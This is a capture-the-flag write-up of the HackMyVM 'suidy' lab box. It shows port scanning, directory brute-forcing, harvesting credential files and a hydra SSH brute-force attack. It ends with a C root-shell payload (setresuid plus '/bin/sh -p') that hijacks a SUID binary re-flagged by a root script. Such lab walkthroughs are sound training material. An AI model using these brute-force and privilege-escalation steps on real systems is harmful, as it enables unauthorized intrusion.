Overview
Another fun box !
| Box Difficulty | Link |
|---|---|
| mediumm | hackmyvm Link |
Recon
Objective : Find out all the open ports and do a nmap service scan.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root💀kali)-[/opt/hackmyv/suidy]
└─# rustscan -a 192.168.56.21
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.21:22
Open 192.168.56.21:80
We can see that there’s 2 open port. Port 22 and 80.
nmap output shows the below:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root💀kali)-[/opt/hackmyv/suidy]
└─# nmap -sV -sC -o nmap.txt 192.168.56.21
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-24 22:00 EST
Nmap scan report for 192.168.56.21
Host is up (0.00012s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 8a:cb:7e:8a:72:82:84:9a:11:43:61:15:c1:e6:32:0b (RSA)
| 256 7a:0e:b6:dd:8f:ee:a7:70:d9:b1:b5:6e:44:8f:c0:49 (ECDSA)
|_ 256 80:18:e6:c7:01:0e:c6:6d:7d:f4:d2:9f:c9:d0:6f:4c (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:2D:0E:C9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.09 seconds
Let’s enumerate port 80!
HTTP- TCP 80
Gobuster shows that there’s two possible files.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Gobuster:
┌──(root💀kali)-[/opt/hackmyv/suidy]
└─# gobuster dir -u http://192.168.56.21:80 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,php.bak,bak,jsp" -o gobuster_p80.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.21:80
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,html,php,php.bak,bak,jsp
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/12/24 22:02:06 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.56.21:80/index.html (Status: 200) [Size: 22]
http://192.168.56.21:80/robots.txt (Status: 200) [Size: 362]
===============================================================
2021/12/24 22:03:52 Finished
===============================================================
robots.txt is always something look at!
1
2
3
4
5
6
7
8
──(root💀kali)-[/opt/hackmyv/suidy]
└─# curl http://192.168.56.21/robots.txt
/hi
/....\..\.-\--.\.-\..\-.
...
...
...
/shehatesme
After curling robots.txt, we can see that all the way at the bottom there’s another interesting file /shehatesme. Let’s take a look at that file!
1
2
3
4
5
6
┌──(root💀kali)-[/opt/hackmyv/suidy]
└─# curl 192.168.56.21/shehatesme/
She hates me because I FOUND THE REAL SECRET!
I put in this directory a lot of .txt files.
ONE of .txt files contains credentials like "theuser/thepass" to access to her system!
All that you need is an small dict from Seclist!
Looks like this time we have to gobuster the specified folder to find out more.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
──(root💀kali)-[/opt/hackmyv/suidy]
└─# gobuster dir -u http://192.168.56.21/shehatesme/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 100 -e -k -s "200,204,301,302,307,403,5
00" -x "txt" -o gobuster_p80.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.21/shehatesme/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/12/24 22:10:47 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.56.21/shehatesme/privacy.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/about.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/new.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/forums.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/search.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/page.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/blog.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/jobs.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/full.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/space.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/link.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/2001.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/other.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/admin.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/faqs.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/welcome.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/google.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/network.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/es.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/java.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/issues.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/guide.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/art.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/folder.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/smilies.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/airport.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/secret.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/procps.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/pynfo.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/lh2.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/wha.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/alba.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/cymru.txt (Status: 200) [Size: 16]
http://192.168.56.21/shehatesme/muze.txt (Status: 200) [Size: 16]
===============================================================
2021/12/24 22:10:58 Finished
===============================================================
There’s really alot of links to look through, let’s save these link in url_links.txt and automate the process of checking the username and password from each link.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
Save the output
┌──(root💀kali)-[/opt/hackmyv/suidy]
└─# cat url_links.txt
http://192.168.56.21/shehatesme/privacy.txt
http://192.168.56.21/shehatesme/about.txt
http://192.168.56.21/shehatesme/new.txt
http://192.168.56.21/shehatesme/forums.txt
http://192.168.56.21/shehatesme/search.txt
http://192.168.56.21/shehatesme/page.txt
http://192.168.56.21/shehatesme/blog.txt
http://192.168.56.21/shehatesme/jobs.txt
http://192.168.56.21/shehatesme/full.txt
http://192.168.56.21/shehatesme/space.txt
http://192.168.56.21/shehatesme/link.txt
http://192.168.56.21/shehatesme/2001.txt
http://192.168.56.21/shehatesme/other.txt
http://192.168.56.21/shehatesme/admin.txt
http://192.168.56.21/shehatesme/faqs.txt
http://192.168.56.21/shehatesme/welcome.txt
http://192.168.56.21/shehatesme/google.txt
http://192.168.56.21/shehatesme/network.txt
http://192.168.56.21/shehatesme/es.txt
http://192.168.56.21/shehatesme/java.txt
http://192.168.56.21/shehatesme/issues.txt
http://192.168.56.21/shehatesme/guide.txt
http://192.168.56.21/shehatesme/art.txt
http://192.168.56.21/shehatesme/folder.txt
http://192.168.56.21/shehatesme/smilies.txt
http://192.168.56.21/shehatesme/airport.txt
http://192.168.56.21/shehatesme/secret.txt
http://192.168.56.21/shehatesme/procps.txt
http://192.168.56.21/shehatesme/pynfo.txt
http://192.168.56.21/shehatesme/lh2.txt
http://192.168.56.21/shehatesme/wha.txt
http://192.168.56.21/shehatesme/alba.txt
http://192.168.56.21/shehatesme/cymru.txt
http://192.168.56.21/shehatesme/muze.txt
Since each file contain user/pass, we download and store it to user_pass.txt
1
2
3
┌──(root💀kali)-[/opt/hackmyv/suidy]
└─# curl http://192.168.56.21/shehatesme/privacy.txt
jaime11/JKiufg6
we can automate the process by cat url_links.txt | while read f; do curl "${f}" >> user_pass.txt; done; This will look up all the links and store the user/password in user_pass.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
──(root💀kali)-[/opt/hackmyv/suidy]
└─# cat url_links.txt | while read f; do curl "${f}" >> user_pass.txt; done;
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 16 100 16 0 0 11355 0 --:--:-- --:--:-- --:--:-- 16000
...
...
....
┌──(root💀kali)-[/opt/hackmyv/suidy]
└─# cat user_pass.txt
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
hidden1/passZZ!
john765/FDrhguy
jaime11/JKiufg6
jhfbvgt/iugbnvh
....
Since there are many repetitive username and password . Next let’s sort the contnent and only store unique username and repeat the same process for the password as well.
1
2
┌──(root💀kali)-[/opt/hackmyv/suidy]
└─# cut -d '/' -f1 user_pass.txt | while read line; do echo "$line" >> user.txt ; done
Explanation of the above code -d ‘/’ use backslash as delimiter (d) -f1 the first (1) field (f) while read line reading from the file, loop over each line as variable $line
And with that we are able to extract the username from each line.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
──(root💀kali)-[/opt/hackmyv/suidy]
└─# sort user.txt | uniq >> sorted_user.txt
┌──(root💀kali)-[/opt/hackmyv/suidy]
└─# cat sorted_user.txt
hidden1
jaime11
jhfbvgt
john765
maria11
mmnnbbv
nhvjguy
smileys
theuser
yuijhse
──(root💀kali)-[/opt/hackmyv/suidy]
└─# cut -d '/' -f2 user_pass.txt | while read line; do echo "$line" >> pass.txt ; done
┌──(root💀kali)-[/opt/hackmyv/suidy]
└─# cut -d '/' -f2 user_pass.txt | while read line; do echo "$line" >> pass.txt ; done
┌──(root💀kali)-[/opt/hackmyv/suidy]
└─# sort pass.txt | uniq >> sorted_pass.txt
┌──(root💀kali)-[/opt/hackmyv/suidy]
└─# cat sorted_pass.txt
98GHbjh
FDrhguy
hjupnkk
iugbnvh
iughtyr
jhfgyRf
JKiufg6
kjhgyut
passZZ!
thepass
Shell as theuser
Let’s use hydra as always to bruteforce SSH with the username and password we found.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root💀kali)-[/opt/hackmyv/suidy]
└─# hydra -s 22 -L sorted_user.txt -P sorted_pass.txt 192.168.56.21 -t 4 ssh -v
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-24 22:39:11
[DATA] max 4 tasks per 1 server, overall 4 tasks, 100 login tries (l:10/p:10), ~25 tries per task
[DATA] attacking ssh://192.168.56.21:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://hidden1@192.168.56.21:22
[INFO] Successful, password authentication is supported by ssh://192.168.56.21:22
[STATUS] 76.00 tries/min, 76 tries in 00:01h, 24 to do in 00:01h, 4 active
[22][ssh] host: 192.168.56.21 login: theuser password: thepass
[STATUS] attack finished for 192.168.56.21 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-24 22:40:30
Looks like the username and password is theuser:thepass …
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root💀kali)-[/opt/hackmyv/suidy]
└─# ssh theuser@192.168.56.21
theuser@192.168.56.21's password:
Linux suidy 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Dec 25 04:41:06 2021 from 192.168.56.3
theuser@suidy:~$ whoami;hostname;id
theuser
suidy
uid=1000(theuser) gid=1000(theuser) grupos=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
Shell as Root
Further enumeration shows that in /home/suidy, there is a suidyyyyy file that has a SUID/SGID bit which we can execute.
1
2
3
4
5
6
7
8
9
10
11
12
theuser@suidy:/home/suidy$ ls -laR
.:
total 52
drwxr-xr-x 3 suidy suidy 4096 sep 27 2020 .
drwxr-xr-x 4 root root 4096 sep 26 2020 ..
-rw------- 1 suidy suidy 12 sep 27 2020 .bash_history
-rw-r--r-- 1 suidy suidy 220 sep 26 2020 .bash_logout
-rw-r--r-- 1 suidy suidy 3526 sep 26 2020 .bashrc
drwxr-xr-x 3 suidy suidy 4096 sep 26 2020 .local
-r--r----- 1 suidy suidy 197 sep 26 2020 note.txt
-rw-r--r-- 1 suidy suidy 807 sep 26 2020 .profile
-rwsrwsr-x 1 root theuser 16704 sep 26 2020 suidyyyyy
-rwsrwsr-x 1 root theuser 16704 sep 26 2020 suidyyyyy
Running the file make us run a suidy
1
2
3
4
5
suidy@suidy:/home/suidy$ cat note.txt
I love SUID files!
The best file is suidyyyyy because users can use it to feel as I feel.
root know it and run an script to be sure that my file has SUID.
If you are "theuser" I hate you!
Readig note.txt shows that :
“The best file is suidyyyyy because users can use it to feel as I feel.” - Feel as I feel means become suidy user itself!
“root know it and run an script to be sure that my file has SUID. “- Means that there is probably a process in the backend that automatically give the file a SUID bit.
Knowing this , On the victim machine, let’s make a executable file so that we can become root!
1
2
3
4
5
6
7
theuser@suidy:~$ pwd
/home/theuser
theuser@suidy:~$ cat suidyyyyy.c
int main(void){
setresuid(0, 0, 0);
system("/bin/sh -p");
}
As you can see that after while the file is given the suid bit. Once it has been given a suid bit we can execute the file to run as root!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
theuser@suidy:~$ ls -la /home/suidy/suidyyyyy
-rwxrwxr-x 1 root theuser 16664 dic 25 05:21 /home/suidy/suidyyyyy
theuser@suidy:~$ ls -la /home/suidy/suidyyyyy
-rwxrwxr-x 1 root theuser 16664 dic 25 05:21 /home/suidy/suidyyyyy
$ whoami
theuser
$ exit
theuser@suidy:~$ ls -la /home/suidy/suidyyyyy
-rwxrwxr-x 1 root theuser 16664 dic 25 05:21 /home/suidy/suidyyyyy
theuser@suidy:~$ ls -la /home/suidy/suidyyyyy
-rwsrwsr-x 1 root theuser 16664 dic 25 05:21 /home/suidy/suidyyyyy
theuser@suidy:~$ /home/suidy/suidyyyyy
# whoami;id
root
uid=0(root) gid=1000(theuser) grupos=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
Awesome ,Rooted!